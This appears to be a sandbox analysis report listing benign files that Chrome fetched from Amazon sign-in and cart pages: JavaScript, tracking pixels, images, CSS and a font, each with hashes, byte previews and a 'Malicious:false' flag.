                                                                                                                                                                                                        Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D8958%26at%3D8958%26t%3D1723729132228%26csmtags%3DendVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:8958
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x343, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11605
                                                                                                                                                                                                        Entropy (8bit):7.940653371084491
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:2hcYJb4LFEwxcx7tyTjQLyQfp/crT7PVHSo6rOsEO3CW6bN5O/V2P/+e:2NktxwyvC1fp/GHhWbObNyV2Ph
                                                                                                                                                                                                        MD5:F98C964BADD9B8B57B656835E194E5F8
                                                                                                                                                                                                        SHA1:88CC5621803511A1DEBFB38FA29395A4EC290813
                                                                                                                                                                                                        SHA-256:961B0BF6E9217A35D5BE097ACB588F04742A0059C1ABED281954F7E75524E225
                                                                                                                                                                                                        SHA-512:393348ED8079B2225366AC3BC32D72EBA0C52964419085CAD868DE0F84BF9C84F4B12FF9F5230241E9B04C59DBB26AC1669C6F1F325D196C4808951EE621FDA9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......W...."..........5..................................................................R..?I.z..2...NL.i.:....x...vF...a8.Y.8...A..4...X;Q.C..Qc.z....O..<_.{....0$zv. ;O!5....n.]..1.N..R.u.\.h.~.2.R..".A.E.A..R....^..?k.\.....]..t.?.....j.!U..c.Q.:...#.].ST.G...G.R*(.......j.?|......^3...}_.....("......h..(....(.*:....o........W......z..w.N.......p...........y........y..0y.....hy.=....<k..}|..l.....Q2-3`...%..Y.F.hl.Bl..-..g....E.....P...s..|..l.o0...B.#a.._..*{VH.3N..l..4I...g..S..(........{.u.o...M.k......@kr4b....(*....@..D..\.k...,..LX..5....j+.6,.We0&g..v..75.qSo..I..Ue..D.i.\.~..c..{..OU..s~..R.vJ....hIE.2.]# t.z<X :..^./g...}T..q..2.....Pj<....L.../<.y......m.T.......&...._...4..y..Y....??.k.`.n.r..DDr...#.$.[...o.;.m..g...=..L..>5.d..+........q...~[.F..'....'....:.[x.L.....f..,.3".Z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11599
                                                                                                                                                                                                        Entropy (8bit):7.967413309473415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Sr4vUhG+D4wLi1I+RDk5D/AFukEYllZP4p3Nb7GOZZHSh3a9vL4QdozM1xEJWbW/:25hGS4wRMUzCgtGOzyh3auDzM1xEiW/
                                                                                                                                                                                                        MD5:49090B94803AB6E687F8362F34140240
                                                                                                                                                                                                        SHA1:E99F86063737614375AFAB52F07540EC2E209E0B
                                                                                                                                                                                                        SHA-256:D1EF0B8D4DFC54202DC385FDD3DD6D64408A2F894AFC44928BBD50B8FD41E48E
                                                                                                                                                                                                        SHA-512:B29FED27AC1483C0030D66441E0DEBB29DD5E2F172A321EE72BC54526D90DD2683ACB867B7496EA8BB8B0F4C74116C60C61D5D5E9D7340EC502B6287BD0090C1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71OCfsKG5nL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."A.#Q.2B...3Uaqr......6RTu......$Sb..%Dcs&Cd....................................................!1..."2AQaq....#4......3Bb.............?.....L.fUY.G9....x.<..._..<a.YY.)().Y.*...IM[.=.~.}..|~u.Q>{..:.9..5._.y...4rp...-.Fo.)*....8(.l.....J|.]...p1.#8.../....>.A q'.z.\5z.l.l.+*.$N......8]...p1.3......U.*a.g^K."H.o.......t..a\..%..?.J....k.......t.O...g..=......5....e..\E.si..].Mg..G.:..UQ..T....-.L.N.....$).._..;.'U.L....y..u.k=\..=Z57......5.N........[...N.Y..Gd.b.....eh.G..Z<..5.G.f.T.T"...7.)._......G.K.............c....L.O6...djvk...WV....F .LX.R..L*.!a%.....W..Cf..9..p.W.KD.x3W9..s.D.N]...UV...J......3E.jXC.w...........W...=...."&F.1.%.."..$h.....07.x.4..L.G.(x..bz....!.H.C.....!m.....F...T+..Ub.YX..lxo.....<...x.-kR.FeOq5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 63x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6608
                                                                                                                                                                                                        Entropy (8bit):7.939964373966567
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:7p3o/7A5PJHoZw/JzFeFkPj8MjAAWGVodTx:7+ExHB1QFkbpsOVQTx
                                                                                                                                                                                                        MD5:5F648AEE3ABD5E98AFC0D1505B27493E
                                                                                                                                                                                                        SHA1:F23A61F3632599A8BD2F34E9C59293C38201AA82
                                                                                                                                                                                                        SHA-256:4D5907328F2D69FB295A9BA058DDA862683DAFA4031B4E40C85E99DAECC9FDC8
                                                                                                                                                                                                        SHA-512:A9D651671B39743993465C12B5497BEE72B14464DBD24890503FAE4548256CEE325394FF8F9645B44C0ACF4142899117B75D04AEB805D992FB8384E1AF0F7308
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/614eD8BhoUL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........?.."................................................................."!1A..#2Qq..a$B..Cc..................................................1..!Aq"#a...3..............?....M..*..N...U.....Y..r$...+0WS.@.N.u....H.._...u.U.`..c.d.!=+NkM..U.n...I.p!..|YO.).a.d.kb.OW.6..r^i.@./t....3..B..Vn..S....Y..)N.X .u.P....D!..[t..4.b..,.pD-.A".p.9|.3N\..A.........|r..s...N....9..h.......:.'.;oNh.@..!d.f...p......[_..B.SP..6.?./.b.Yich......=.B_]..,.1.N2Id..b...g(..... ....:W.j}.+.#:.).W......o.2N...>.muY.0..^dk~h.$....O....j...{3.4...y......'.W`.Tp..!.e~..s.,.....E_s.o.%.^Ls......E.._r>5.Z.......Y....E.........O...6...7.m.(.R.H.YI.p...D..Y...)2..h..}T.w*;.I.....\...;...@...T?...B...n".....2..L.c.....!..#..._S.|..3w..#5YL.....32c...Nh.gn.... ..U..<.G.G.D.c.....C.......f)^y...2...vq$.,.@.b.b.Gu....HD&8w..%...t..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D1707%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D3855%26pc%3D8962%26at%3D8962%26t%3D1723729132232%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:8962
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2974
                                                                                                                                                                                                        Entropy (8bit):7.783838065415687
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6xxKRTce7RbbYxl2D4y4llhyitJ4qoKo3eYs0+G1lEtbbp8MxQjIzz:TJARTcAbd2/hBkJJeY/LlEtbF8MxQsP
                                                                                                                                                                                                        MD5:7F46081DE151EF8F9A7C6BB270425932
                                                                                                                                                                                                        SHA1:5FAA281FF0ACE8BC9F979DF91CAA898C9F808FA4
                                                                                                                                                                                                        SHA-256:B70C6DCC5355E0EC0DA60CA116E88F5A8E6EED57D1D2B430812155C1B27698D4
                                                                                                                                                                                                        SHA-512:E3840AA124C73CF3FE708D4A228CD2A7FB9AA5AB5A1210CED188BE42540409E62D36CD22E14A8FABD88954E23007746021FE259948DC1F4B39B3A72051D11922
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.."AQ..2.BRaq....#3Sbcr$C.D.........................................................?..R..R..R..R..R.D......I=...U5..k.m%xt...o[.c...1.W.Q..Dn...{.T."......7..#hiZ...N.....~zIk..~.......K..,..].....q'?(.....it..[{.p..0..<d.H......R..R..R..R..R..R..R.......".gb..Te.....I.UW.fi.f/{..k16?.e..D...v..;2h./+....0....&..ms.....ys<...m(...Z.$.?.G..$.z.N}._..|.~...U..%.I.5.......t....v..h=zf.......m..~..1....z?....o.c.Wi..2.T..$..'-.....:... ..T.:....jCM..-,..^.._GE2.?.p.55.T.*!JR.JR.JR.JR.JR.JR.X.f.qey.....R2.u .0k%P.......-..:s2..d.Qo.1A...d..E.....82C.e....(.*8.....lP"....}p.......cXH....(.to..>a.......V..g.&H.OR.... ~.........+.`.."y..L(..C...`...Mx..5hf......y..:?]......dj.2.:.|.....67zm..L.H#dY..&0.tI.)$,..$H..NE{.k9.9.....2|Q
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (46786)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):63172
                                                                                                                                                                                                        Entropy (8bit):5.10113255023049
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:48haBhFqANzdye4xHvCLkhRAeaLqLj/Re6MGpNjU:UBhG/lU
                                                                                                                                                                                                        MD5:2E30D2F73B5081471B6349C5D86DAC29
                                                                                                                                                                                                        SHA1:F91E99644563DFAE5F78DBB3F25E3BF2491FD267
                                                                                                                                                                                                        SHA-256:599D388AA2ABB18D5DBA23E53EF2628731CCECB4AD61E6FA4343854E6F59A391
                                                                                                                                                                                                        SHA-512:426D863142047F724B9BEAC5F6E46CF69BC743889D144E9EBC1E2CEA4BFA15FBBC3A69DEDC1FA7F523A716DFBB4C8EF865AD83ABDEA7FB6D47EF6B22B3D90D82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC%7C31jdWD+JB+L.css,51EK8BINbtL.css_.css?AUIClients/AuthenticationPortalAssets"
                                                                                                                                                                                                        Preview:.ui-helper-hidden{display:none}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after,.ui-helper-clearfix:before{content:"";display:table;border-collapse:collapse}.ui-helper-clearfix:after{clear:both}.ui-helper-clearfix{min-height:0}.ui-helper-zfix{width:100%;height:100%;top:0;left:0;position:absolute;opacity:0;filter:Alpha(Opacity=0)}.ui-front{z-index:100}.ui-state-disabled{cursor:default!important}.ui-icon{display:block;text-indent:-99999px;overflow:hidden;background-repeat:no-repeat}.ui-widget-overlay{position:fixed;top:0;left:0;width:100%;height:100%}./* ******** */./*! jQuery UI - v1.10.3 - 2018-03-26.* http://jqueryui.com.* Includes: jquery.ui.core.css, jquery.ui.autocomplete.css, jquery.ui.menu.css, jquery.ui.theme.css.* Copyright 2018 jQuery Foundation a
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5228
                                                                                                                                                                                                        Entropy (8bit):7.90700671848677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TmyQsqqqqqWvK1e9Ikoa7fikS3yEubJ4OfGc2apR/Vkkosfl0tPBFcfV:CyQsqqqqqzIbLikS3YJbfGc5NkkjfGtU
                                                                                                                                                                                                        MD5:542635B6A8D74B772E55F0A3D3573E9E
                                                                                                                                                                                                        SHA1:B8140FB06B950C313590D3CCD34E7F4690694AC6
                                                                                                                                                                                                        SHA-256:62E4370BE15EB9DA407BB517818A0F0211D3AEB40E56FA97649DAD0907629A50
                                                                                                                                                                                                        SHA-512:4846BED2A8A63844EAAE8B1A9CCAA6D16940F11374DDF366A2F803C0686A2B7C1B8BF56E21E1485248CD9361DF130BF6F7ADDFED50EA9CBD24890A5786B62AF9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-monitor_372x232_ae-en._SY116_CB608574213_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.."1..23AQSs....Bqr..#$a....U..6bc..................................................!1..."A...2Qa.............?...{x.Q..z4...*n...O..)m.a.q....!...../.Z.v...T.!...../.Z.v...T.d.*...hR..J.=..1..(..V...~....../..z..........O.e....7......i._.:.>.<...C!^.E~h.z.>.<...V...~.5(.z.>.<...V...~.5(.z.>.<...V...~.5(.z.>.<...V...~.5(.z.>.<...V...~.5(.z.>.<...V...~.5(.z.>.<...V...~.5(.m..?.?.T.........R..&........awuix...........;.A.p.r98"....H..R....1.pbFg.. ...4{.c.9.t]...^..I.!.P.gU7;.h.5....)s.uYs..V.......).c..k.s..(Pc8...fuN...SZ...y#1...(wPN.+)8$..#.*.`...Hc.....*U...`...P.*.Z..K..e.|Eo..S..v.dQ.C.#........u6;Os.o...b.j.m.{.#..a.(*W<.bs.=.#...i6v.$FhD.C.'.0..........H...F..).z..m.4>[...=....c.d..._u..Meb...O.......j..-4....!.r.4g.....d..m
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (578)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):39443
                                                                                                                                                                                                        Entropy (8bit):5.2780704875671915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:IkCPQDBmm1Xnqfl1Putay7q7KdzGPTILRMmG6uWI9ub2od4opBjSP9d6EaaV:7mmQfHPOzG7mGmFnQ
                                                                                                                                                                                                        MD5:02E169681A08E9F586F64C18DA517907
                                                                                                                                                                                                        SHA1:AEDFC6EC48E65427CDE94D4CE0BCD4B103274AA2
                                                                                                                                                                                                        SHA-256:611F04E4D8CF8854DFF785B2A0796A1CB4A49240EF205D6E598F77678D14C4B1
                                                                                                                                                                                                        SHA-512:FE4774B8EB9C3A79D92855063F7BA59554180CEE22B051FA3E83A22CF6BEDFB94CA94FD53F18C7DF4667219FB299BC9D368947ED06501DC42275B7BC45B1D9C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(m){var n=window.AmazonUIPageJS||window.P,u=n._namespace||n.attributeErrors,c=u?u("CartD12nAssets",""):n;c.guardFatal?c.guardFatal(m)(c,window):c.execute(function(){m(c,window)})})(function(m,n,u){m.when("A","jQuery","CartServerSetting","CartBaseView","Cart","dibs-csrf").register("dibs-desktop-cart-actions",function(c,e,b,f,k,g){if(0===e("html.a-mobile").length){e=function(a,d,e){var b=a.data.dibsItemId,c=a.data.itemID||b;a=a.data.isFresh;b=[{name:["submit.dibs-remove",b,b].join("."),value:1},.{name:"pageAction",value:"remove-dibs-item"}];a&&b.push({name:"expandFreshCart",value:1});b=b.concat(g.getFreshCsrf());c&&"undefined"!==c&&f.takeCartActionForSingleItem(c,"active","dibs-remove",b,null,d,e)};var h=function(a,d,e){e&&a.push({name:d,value:e})},l=function(a,d){return d.some(function(d){return a.startsWith(d)})};c.on("dibs:item:remove",e);return{selectItem:function(a,d,e){var b=a.data.itemID,c=a.data.dibsItemId,k=a.data.alexaBadgingId,w=a.data.brandId,r=a.data.cartType,D=a.da
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 13 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):538
                                                                                                                                                                                                        Entropy (8bit):7.363900406422438
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:6v/7r/6TBLr8CzfiF2PuKoSpH/geL6Ou4zlWkqMlMQn9inLjj5N:i/6FLlzu8kSdg3GNqMlGr5N
                                                                                                                                                                                                        MD5:3920E1FFC5AB160D1D7F18D8D6303633
                                                                                                                                                                                                        SHA1:53390E776D482DB9E85814A752276F517523724C
                                                                                                                                                                                                        SHA-256:3F8C75CC2824A1CE825FF2623763046C497B7D06587C14A07FD775F7506BCDA5
                                                                                                                                                                                                        SHA-512:5F368C2EFCA94B7021CC693CE95C9A598EEAAFF83072E2D14FF6A6EFE272A07B9301536237EE263E398D87CBE1E72879D11CC6EB443211C99118FB88E85CF35C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png
                                                                                                                                                                                                        Preview:.PNG........IHDR...................pHYs.................tIME.......}.......bKGD..............IDAT8...n.0.E.V....J...@..........f&...'@.[.202..d...$*[:"..Vv..Z.z..N.....V.q6....P.X,.r.,;E.....L.S..#.c..y.=.'..h.).....!.....`.........BR....#.)PdP... ....4............:.f.Z.....4...A..<..y.....N.....,..\.!.L..v...1]...d...t....*i..5.A....(.......O,..E.o...RM.....h4..j.*..JU.\/t..j/P.$........z=...C..&y...z-.9b..*!B..(...=U...B.J..M..,!n..............!u...x+.u.B'....=...j..O..{.E.*~{...j...?......J.T....IEND.B`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 17448, version 1.655
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17448
                                                                                                                                                                                                        Entropy (8bit):7.988215424387779
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:nWARfBAmbn4a/03ipMctUBgZYByNtBtqKm+sO6nnkofowobaa1FKymG:h9DV/LMM6SNtmdO6nnkof9opKymG
                                                                                                                                                                                                        MD5:48B83F7B9CF25C402AC0946A957F74BA
                                                                                                                                                                                                        SHA1:80FF7ABA37DD1FF5A6B90233A19E3A780A96DC2F
                                                                                                                                                                                                        SHA-256:E27466D19D5B9459F659FACA4609650719F1AA6E9ABCD5BAB91E1A3BA63AC2F0
                                                                                                                                                                                                        SHA-512:43CF9FB0EDFAECE5D3B3ED390C18383D7126D3551B2008FF6ACC8D37887603FAB5011DB63117496D275417C1C5326FF537011F97468ECDE2CA1973AEBB209343
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/2SazJx$EeTHfhMN.woff2
                                                                                                                                                                                                        Preview:wOF2......D(..........C.........................?FFTM..8.....@.`..~.....<....6.$..F..<.. ..N..a?webf......6m....{w..V...=...f.B.8`...f...........5..1.)4(R.+..$C..t.1......OP..{......"e...OrB.t<.d..0H....V[ "PL.%C.+.x. .,....p..Z2fd..w%Q..........,..BG^...;.......Jl...[.E:......?.?D..y.m...Q.......'./VD+;I..b.:.U.-..y~n..[0....9.H.....'.lt.(..F...#E...&..&....+1>.....5..\.Y..l...8..5.5...t..P......j#....i."...Z....s't..{px.......:.R!..Kk.e...8+... ....s.sJ.......&\..........3{..j.i.u{....(..h.Z6.9[5.M....T..........$2..6.|.={....)[,.7_..gC.""b..1.a:..." -*&..$.}?.v.!.&.!.U..J&E..zs.....Y?..a.....HZ.x.....Ud.;3....X.....V...Mc&..~.n%...2........]GL...Nzea...S.hDCzH..o...\|...q..|.N.h@Z.[...c..X..... @.r.. ..B4..9........x..(9%.....rN..s..|.;..[7.]y....~u.7..E.zc..../1..M.1..b~..........I.[c.pXyC._KJ..ry.Y....a..._....j.JQ...'..9E..M..4.g......@6... 0..8.<mo..S.....`o.ED.....r...Iut...(!... A$.....""-....T.....;..( (*^......_=..+..8mQ..o.S............
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12778
                                                                                                                                                                                                        Entropy (8bit):7.891879750786238
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:khkCyJ6soic4mAzU4OZwLoBMIa9h1qrN8Du1an00LYw179jxEfd9kp:kWJsR4rLS21qh8DLtLYw17sl9kp
                                                                                                                                                                                                        MD5:557A8E87039A78796A75C4D92F05B26A
                                                                                                                                                                                                        SHA1:C64D8AD8C15720E3A26EF7547D17E104EA15C4F5
                                                                                                                                                                                                        SHA-256:DA692F5D575E642529BF9C8B5600FD6F5D8B0C4F8610E04E2625E59E33E4B680
                                                                                                                                                                                                        SHA-512:9B6DAF97C03E63AB2C4F2A2CAF110997483A83E743CBD2702AD0EF99C9214222CFD0B84BEE2694F384C9DC5C9565499773760E5FAE28A4F9E31362952CA18A74
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
